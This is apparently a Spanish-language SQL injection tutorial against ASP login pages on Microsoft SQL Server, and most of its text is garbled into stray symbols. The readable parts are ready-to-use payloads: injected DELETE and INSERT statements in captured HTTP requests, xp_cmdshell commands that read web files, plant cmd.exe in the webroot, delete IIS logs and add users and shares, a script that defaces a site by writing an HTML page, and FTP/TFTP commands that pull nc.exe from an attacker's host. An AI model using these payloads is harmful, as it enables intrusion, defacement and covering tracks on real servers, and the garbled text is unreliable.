#$% # 6 F

!:#; "

'delete from usuarios where UID='Usuario'--

1 4 $

" 4 " " " & 4

1#8 ;& )

& " " 9 + " " " &

KKKF 9

" "

" 6

. =

" ( "& +

"9 9 6 "

) "

7 .

" & "

" )

" ""

( " E' " & (

! . & + " 4 . 9 = 6 " 9 " "

2? 5"= " ".

9 = (

. " )

<" " " " " ) " & 9 " " " !:#; 6= :)6 7< * 9 " + . " " "+" " "

1#8 ; * "

4 "

" +

& "

+ & 6

POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 113 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser %27%2C%27MyPassword%27%29--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L] " " "6 " EL + " L&L +! "" LF00 % & " (

! .

! . " 7

" )

" 6" "

& <

"" " " " * 6 "* " >8<

" #$% 1: "9 #

! 4 *

" "

" *

" "

) (

" & " . " * #$% # 6

" $

% " ) "

# "

" " 6 "

?4; <

$ " "

" " 8< " " #0#$%& " ") " 5 . " "&

# " & ,%%L" 9 " &

* #0#$% )

< " " ")

" " " <

"& .

2@ "

" &

" 5

" <

"& " )

)

" *

" "

N Q " > "> 4 "

" "& " "" " " < Q "

K6 " ;;!

) "

" "

"9 " ( =

"" " "

9 " " + "

(

6 6= #$% " ".

POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe +dir+c%3A%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + "L]8N8' " ) < Q " L < L00 :M 9 E ,

)

" 6 =

)

" * " " *

" " ) . 4

" ) 4

= )

&6 6 " " =

" 4 & " " " )" 6 " * "6 "6 " E8 " " " "F

< Q

)

) 4 ")

> "

" < Q

( "

. "

" "

"* E/

. &

" "1

& 9

#5 F " " 9 " " & F "

! " EXEC master..xp_cmdshell 'dir c:\inetpub\wwwroot\' ! 6 9 6 EXEC master..xp_cmdshell 'type c:\inetpub\wwwroot\alguna_pagina.asp' ! " ) EXEC master..xp_cmdshell 'copy c:\winnt\system32\cmd.exe c:\inetpub\wwwroot\chroot.exe' ! ) " EXEC master..xp_cmdshell 'DIR c:\winnt\system32\logfiles\w3svc1\' EXEC master..xp_cmdshell 'NET STOP "Servicio de publicaci贸n en World Wide Web"' EXEC master..xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc1\ filelog.log' EXEC master..xp_cmdshell 'NET START "Servicio de publicaci贸n en World Wide Web"' ! 6 " EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path' ! " 6 G " EXEC master..xp_cmdshell 'NET USER username password' :M&

)

" 8< " "

" .

">& "

" " #

" >8<

" )7 ) " +

">&

" &

>1 4 "

'exec master..sp_addlogin MyUser, MyPass 9 ;

" "

! " =

" .

" "

)

6 &"

* & . . " ) & " " " "> + >8< # ! "> 9 ) = " " ! " " " " " & #0#$% # 6 " * " "+" " " 6 "* "

" " )

" 9 " " ># " " ) " "* " + " "

2B " " " " "

Q Q Q " Q *. Q "6

+ )

- $ %+ ) % " " " 4 & ) * (

)

Q . Q ) "M Q . Q . Q . M +

& *

" %

" < < < <

> * "

+( 9 :,-'F& " " " 322& 9 " # )

7 9 9

< < < < < &

" " " " "

"+ 7 ' 4 "

" " " H

" " .

" " " (

" " ) 4 "

" + #$% 9 4

> "& 9

(

67"

#$% E$ + " #$% 6= #5& " ) * " #$%&

) " ""

)

" & ".

" .

" 1 & M <& 6

Q . 6 Q" 6 Q " Q Q 6 .

&9 4 . " > . (( # < " " " . "* . "

+ "

* + ;

" >& 7

" "

----- Extracto -----------------------------------------[...] La idea es crear una pagina html o asp, si en el sitio objetivo se encuentra activo y funci贸nando un webserver [...] declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\web-hosting\attajdid\index3.html', 1 exec @ret=sp_oamethod @f, 'writeline', NULL, '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>'

exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY> <TR> <TD bgColor=#d20000>&nbsp;</TD></TR> <TR> <TD align=middle bgColor=#ffff00>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD ' exec @ret=sp_oamethod @f, 'writeline', NULL, 'bgColor=#d20000>&nbsp ;</TD></TR><!--" "-></TBODY></TABLE></CENTER></DIV> ' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P><BR><BR><BR><BR><BR></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>' exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>' Para subir archivos.- Creamos un archivo get.txt para utilizar luego ftp declare @o int, @f int, @t int, @ret int EXECUTE sp_oacreate 'scripting.filesystemobject', @o out EXECUTE sp_oamethod @o, 'createtextfile', @f out, 'c:\get.txt', 1 EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user anonymous' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get nc.exe' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit' EXECUTE master.xp_cmdshell 'FTP -s c:\get.txt NUESTROHOST' o algo mas fácil si tenemos un tftp en nuestro host EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET c:\mi_local_file c:\remote_file'

----- Extracto -----------------------------------------:M&

) )4 " 6 " *=" " "

" " # 6 "

. E

. " 9 " 8

& ) " " "

( " * " 6" " #0#$% # 6 & ") " . " " &" " Q +" Q 9 " " )4 :%8 " " * #$% " . * "+" )4 F + " 7 " )4 6 " ) " "

; " Q

. &c " & M : ;! ; < a

)4 `& ; " Q

`& 6 `&` ` aa

M & : ;! ; a Va

# ) " " ) " 9 7

9 & "IF *

) 5 *

&9 "&

" 6"

" D " ) + =

" & J

" "

)

) " "

" " ) " " & " + " . &"

7 "

: .

" "

G )5 " " "

L 1;: : ;A %8L > > + = " "+ )

#$% 9 6 ) <" 6 " ( " E: ) = " * " " " #$% + "

)

# "

" +! 4 > " " #$% 4

* # ' %

#0#$%

) .

") " " 0

" "9 9 " .J #$% 4

) 4 "

! "

` : ;! ; a

= "

3 03 ! # )" " ") " 1 :1 " ) H " 1 " J

" ""

0 +,# )" " ") " 1 :1 " ) ! "5 1 " J

" E *Q* KF "

" ""

0$ . # ':!S E8 " # )" " ") " 1 :1 " ) ! "5 J "" ""

" " ) "K

0 # )" " ") " 1 :1 " ) ! "5 " J "" "" " ) "K " " "" " E< Q " &" Q " F "@ %

. *

" " .

. " .

9 " & " 4 "

& "& "

7 . " 6 7 . "

" * " 6

)

" ".

( #0#$%

" " "

( " (

& ") 6

" )

)

# 6 " " 6 " "

"9 " J " " 6 " ) "

" "9 ! 4 *=" " "" 6 8" ) ( ! = ' ( # * * " " < + " ;'! 322 + ,! 323F 1 " " 6 " ) " " 6 1 " " = & " " "

! M

"" ""

" A

" 6= "

" ) "

" 8"

" 6

#$% " 6

3 ! " " " . " . * . E, " 6 " ) " "" " . ( & M" ) *. F H *9 6 " " " " " #0#$% # 6 8" ) ( " 6 . " "& " ) " " 9 ( " " " " 8" ) ( 6 " " . 6 " * " * E " " " . ) 0 " " " * ( " M " " MF 8" ) ( "" * #5 # " 9 " . & " " " * " ." 6 #0#$% 6 ' 1 4 ) ) " " 6 " " " " " " . " ( " . " H 6 ) " " ) " " ' 9 " " " " " " " " " >$ > " " " 9 " " . ) " " "A %

#0#$% # 6 " 6 " " 6 " . & 9 . 6 ( " " " " '

" 6

" . 6 8

! "

. 9 " "

* "

& +" ") " 7 " + " " * " " " ") " " " ) + +" ( " " " ) 4 " 6 " " " . "

" " + " "" ") " & ") < M ." ) #0#$% # 6

" 6 & <" "9

" "

+ "* " " +# 6 "! " ) " "& 6 " " . G " " " " " . > + " " " ) = 6 " #$% 4 # ) * " " * M . * " "* "& " " ) = " . 6 ) " ) " " " " " . ( # #;8 5 G "

( M" ". " ) " .

" ""

" 9 " ) " + = " 7< " +

" 8

" G " "" "+ " " " " 6 " E; " " 9 "

" 7

" "

"& 6

. " . 6" "

" .

" "

" . "& " "A = & *. " "" * " * & " ) "" 6 > .= " ) " ) " *= 4 & 74

. "

& " &

" " #0#$%F 8" . " D " ". *

)

6 G " 2& + " " ") "9 " " " " ) " " " . E5 ( " 5 "& , 6 " # . & 8A#& F "= )7 %81;: " * " ( " " " " * & " " 9 ". ) " " #0 #& #0#$%& # " " 8 !& " " ) ( " * & " . &+ 9 #:- 8 " " 6 5

" "

" 9 + " " " " " 6 " . 6" " "

"& +

5 " >5 . !

)

" + " 6

" "

" >

" *

7 " + %

" 9 "

M . 8< " M . "9 "

7 " #$% " '

% & ! & G " > E #-1 B303B 022CB0@F M " Q QG " "9 "9 Q 3

" * "9 6 6 " + " + " " #$% 4 G ! * " " " .Q#$%Q# 6 Q " .Q#$%Q 4 * < . "" " 6 Q"9 Q 4 * < . "" " Q 6 Q"9 Q 4 * < . "" " 0#$% * < . "" " M .0"9 0 "" " * < . "" "6 .Q ) " Q" + * " " + 6 " ?,! 1 ! @8 " . " Q6 "9 "

! M " M "

M " "

< + +

* .'

" M M M " #9 )* (

+9 " " 5

- M > "

" ) & ">

6 6

33 M M M M

" " " " << " "

" " " "

+ . 1; " " #9 M ( + . G "9 < + . G "9 .( + + . )5 "0 0 @0) ( "

" " M + "B 01 0 0' 0S

" "

, :! "9 " . II )+ 5 . ' % . " " " * " ) ") "I )+ 5 . 6.

* * "

)+ 1 F )+

" 59 =

. & " 6 = " . " = &+9 . " )

9 "

" . D

. &

. 1

( +

" " "

" " . (( # + ; > > < 1 ) " ) " " " + 9 " ") 6

" " "6 " "* ( " " ") ( "

" ( & 9 " * "9 " "& " < ") " "" "

" "

" )7

. " "

" * " * ;

= " "

MQJ

% ! ( (

** = " . "

" ;

" "

/ !

9 " # & .

" " " 5 " >5 . !

= #0#$%& "9

67" "

+# * " " .

" " #$% 4 % d " "

" * >

" &

# 9 . " " E8"

" "

" .

"J . " <"

" " " " .

"KF "

" 9 D

+* O1 <